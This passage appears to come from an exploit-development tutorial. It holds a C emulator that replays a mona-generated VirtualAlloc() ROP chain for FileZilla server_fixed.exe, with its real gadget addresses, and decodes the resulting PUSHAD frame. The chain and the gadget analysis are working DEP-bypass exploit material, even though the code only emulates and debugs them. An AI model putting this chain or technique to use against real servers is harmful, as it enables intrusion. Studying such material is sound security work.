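immediately.

```c
/* Added example, not mona's or FileZilla's code: replay the VirtualAlloc() chain printed above through
 * a tiny emulator of the gadget shapes mona listed (semantics copied from mona's comments, not
 * disassembled) and decode the frame PUSHAD leaves on the stack. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI, NREG };            /* PUSHAD push order */
typedef enum { POP_R, XOR_EDX, ADD_EDX_EBX_POP_EBX, MOV_EAX_PTR_ESI_POP_ESI_POP_ECX,
               MOV_ESI_EAX, PUSHAD_RETN, UNSAFE } kind_t;
typedef struct { uint32_t addr; kind_t kind; int reg; uint32_t retn; const char *why; } gadget_t;

#define IAT_VIRTUALALLOC         0x10082148u  /* IAT slot mona found in FileZilla server_fixed.exe */
#define FAKE_VIRTUALALLOC        0x77a0a5c0u  /* ASSUMPTION: constructed *IAT value; the real one is not on the page */
#define HYPOTHETICAL_MOV_ESI_EAX 0xdead0001u  /* ASSUMPTION: stand-in for a clean PUSH EAX # POP ESI # RETN */

/* Gadgets the chain executes before PUSHAD, at the addresses mona printed. */
static const gadget_t GADGETS[] = {
    { 0x1004388a, POP_R, ESI, 0, NULL },      { 0x1000c99f, MOV_EAX_PTR_ESI_POP_ESI_POP_ECX, 0, 0, NULL },
    { 0x1002f7f0, UNSAFE, 0, 0, "MOV [EAX+8],ECX writes into kernel32 code; its RETN pops a PUSHAD-saved value" },
    { HYPOTHETICAL_MOV_ESI_EAX, MOV_ESI_EAX, 0, 0, NULL },
    { 0x1005e2e1, POP_R, EBP, 0, NULL },      { 0x100681a5, POP_R, EBX, 0, NULL },
    { 0x10055082, POP_R, EBX, 0, NULL },      { 0x1007c05c, XOR_EDX, 0, 0, NULL },
    { 0x10078e3e, ADD_EDX_EBX_POP_EBX, 0, 0x10, NULL },   /* ADD EDX,EBX # POP EBX # RETN 0x10 */
    { 0x10080d44, POP_R, ECX, 0, NULL },      { 0x10066f18, POP_R, EDI, 0, NULL },
    { 0x1002aeaf, POP_R, EAX, 0, NULL },      { 0x10014f48, PUSHAD_RETN, 0, 0x0c, NULL }, /* PUSHAD # RETN 0x0C */
};
/* The VirtualAlloc() chain exactly as mona printed it above (26 dwords). */
static const uint32_t VA_CHAIN[26] = {
    0x1004388a, 0x10082148, 0x1000c99f, 0x41414141, 0x41414141, 0x1002f7f0, 0x1005e2e1, 0x10007dba,
    0x100681a5, 0x00000001, 0x10055082, 0x00001000, 0x1007c05c, 0x10078e3e, 0x41414141, 0x10080d44,
    0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x00000040, 0x10066f18, 0x10068884, 0x1002aeaf,
    0x90909090, 0x10014f48 };

#define CHAIN_BASE 16   /* dword index of the chain inside the constructed stack (room below for PUSHAD) */
typedef struct {
    uint32_t r[NREG], stack[64];   /* constructed stack; "addresses" are byte offsets into it */
    uint32_t frame_at, retn_skip;  /* dword index of the saved EDI; bytes the PUSHAD gadget's RETN discards */
    const char *error;
} vm_t;

static const gadget_t *lookup(uint32_t addr) {
    for (size_t i = 0; i < sizeof GADGETS / sizeof GADGETS[0]; i++)
        if (GADGETS[i].addr == addr) return &GADGETS[i];
    return NULL;
}
static uint32_t read32(uint32_t addr) { return addr == IAT_VIRTUALALLOC ? FAKE_VIRTUALALLOC : 0; }

/* Runs the chain until PUSHAD (returns 1); returns 0 when an unknown or unsafe gadget is hit. */
static int run_chain(vm_t *vm, const uint32_t *chain, size_t n) {
    memset(vm, 0, sizeof *vm);
    memcpy(&vm->stack[CHAIN_BASE], chain, n * sizeof chain[0]);
    uint32_t sp = CHAIN_BASE, skip = 0;
    for (;;) {
        uint32_t addr = vm->stack[sp++];   /* RETN pops the next gadget address ... */
        sp += skip; skip = 0;               /* ... and RETN 0xNN then discards NN bytes */
        const gadget_t *g = lookup(addr);
        if (!g) { vm->error = "not a gadget this emulator knows"; return 0; }
        switch (g->kind) {
        case POP_R:       vm->r[g->reg] = vm->stack[sp++]; break;
        case XOR_EDX:     vm->r[EDX] = 0; break;
        case MOV_ESI_EAX: vm->r[ESI] = vm->r[EAX]; break;
        case ADD_EDX_EBX_POP_EBX:   /* the POP here overwrites the dwSize loaded earlier */
            vm->r[EDX] += vm->r[EBX]; vm->r[EBX] = vm->stack[sp++]; break;
        case MOV_EAX_PTR_ESI_POP_ESI_POP_ECX:
            vm->r[EAX] = read32(vm->r[ESI]); vm->r[ESI] = vm->stack[sp++]; vm->r[ECX] = vm->stack[sp++]; break;
        case PUSHAD_RETN: {
            uint32_t saved[NREG];
            memcpy(saved, vm->r, sizeof saved);
            saved[ESP] = sp * 4;   /* PUSHAD saves the pre-push ESP: the slot right after the gadget address */
            for (int i = 0; i < NREG; i++) vm->stack[--sp] = saved[i];   /* EAX ends highest, EDI lowest */
            vm->frame_at = sp; vm->retn_skip = g->retn;
            return 1;
        }
        case UNSAFE: vm->error = g->why; return 0;
        }
        skip = g->retn / 4;
    }
}

/* The PUSHAD frame as a stdcall API would read it once the ROP NOP in EDI has returned into ESI. */
typedef struct { uint32_t api, ret_to, lpAddress, dwSize, flAllocationType, flProtect, landing,
                 retn_lands_on; /* where the ROP NOP really returns, given the PUSHAD gadget's RETN 0xNN */ } frame_t;

static frame_t decode_frame(const vm_t *vm) {
    const uint32_t *f = &vm->stack[vm->frame_at];  /* f[0]=EDI f[1]=ESI f[2]=EBP f[3]=ESP f[4]=EBX f[5]=EDX f[6]=ECX f[7]=EAX */
    frame_t out = { f[1], f[2], f[3], f[4], f[5], f[6], f[7], f[1 + vm->retn_skip / 4] };
    return out;   /* a plain RETN lands on f[1] (the API); RETN 0x0C lands on f[4] (dwSize) */
}

/* Replays the chain, optionally with a clean ESI-loading gadget and dwSize in the slot the POP EBX consumes. */
static int emulate_va(int clean_mov_esi, int fix_dwsize, frame_t *out, const char **err) {
    uint32_t chain[26];
    memcpy(chain, VA_CHAIN, sizeof chain);
    if (clean_mov_esi) chain[5]  = HYPOTHETICAL_MOV_ESI_EAX;  /* replaces 0x1002f7f0 */
    if (fix_dwsize)    chain[14] = 0x00000001;                /* dwSize instead of the 0x41414141 filler */
    vm_t vm;
    if (!run_chain(&vm, chain, 26)) { *err = vm.error; return 0; }
    *out = decode_frame(&vm);
    return 1;
}

int main(void) {
    frame_t f; const char *err = "";
    if (!emulate_va(0, 0, &f, &err)) printf("as generated: stops at 0x1002f7f0: %s\n", err);
    if (emulate_va(1, 0, &f, &err))
        printf("clean MOV ESI,EAX: api=%08x ret=%08x lpAddress=+%u dwSize=%08x type=%08x prot=%08x; RETN 0x0C returns into %08x\n",
               (unsigned)f.api, (unsigned)f.ret_to, (unsigned)f.lpAddress, (unsigned)f.dwSize,
               (unsigned)f.flAllocationType, (unsigned)f.flProtect, (unsigned)f.retn_lands_on);
    return 0;
}
```

The RETN 0xNN handling is the detail worth keeping in mind when reading mona's "Filler (RETN offset compensation)" lines: the return address is popped first, then NN bytes are discarded, which is why four fillers follow the POP ECX gadget but the value for ECX comes after them. The PUSHAD frame decoding shows the other side of the same rule: a trailing RETN 0x04 or 0x0C on the PUSHAD gadget discards saved registers that the frame layout depends on.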